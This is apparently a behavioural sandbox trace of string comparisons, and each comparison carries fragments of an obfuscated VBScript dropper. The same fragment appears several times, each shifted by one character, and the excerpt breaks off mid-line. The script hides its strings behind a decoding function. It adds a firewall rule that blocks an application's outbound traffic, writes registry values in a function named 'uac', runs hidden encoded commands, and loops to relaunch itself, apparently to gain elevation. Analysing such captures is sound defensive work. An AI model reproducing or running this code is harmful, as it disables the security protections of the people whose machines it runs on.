rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0222.998] wcsncmp (_String1=".Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0222.998] wcsncmp (_String1="Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.998] wcsncmp (_String1="ules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.998] wcsncmp (_String1="les\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 